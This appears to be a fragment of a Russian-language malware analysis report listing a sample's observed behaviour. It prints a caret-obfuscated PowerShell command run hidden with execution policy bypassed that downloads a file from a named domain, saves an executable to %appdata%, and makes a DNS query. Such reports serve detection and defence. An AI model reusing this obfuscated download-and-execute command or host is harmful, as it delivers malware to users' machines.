Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWe^r^She^l^L.^ex^E^ ^-EXEcUTI^oNpoLIC^Y ^b^yPa^SS^ -n^OPr^ofi^LE -^w^iNDo^WStYl^e ^h^iDD^E^N^ (^n^E^W-O^BJec^t^ ^s^YSTeM.nET.we^B^clien^t).D^O^wnLOAd^fIL^E^('http://dosehoop.to...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "PoWe^r^She^l^L.^ex^E^ ^-EXEcUTI^oNpoLIC^Y ^b^yPa^SS^ -n^OPr^ofi^LE -^w^iNDo^WStYl^e ^h^iDD^E^N^ (^n^E^W-O^BJec^t^ ^s^YSTeM.nET.we^B^clien^t).D^O^wnLOAd^fIL^E^('http://dosehoop.to...' (со скрытым окном)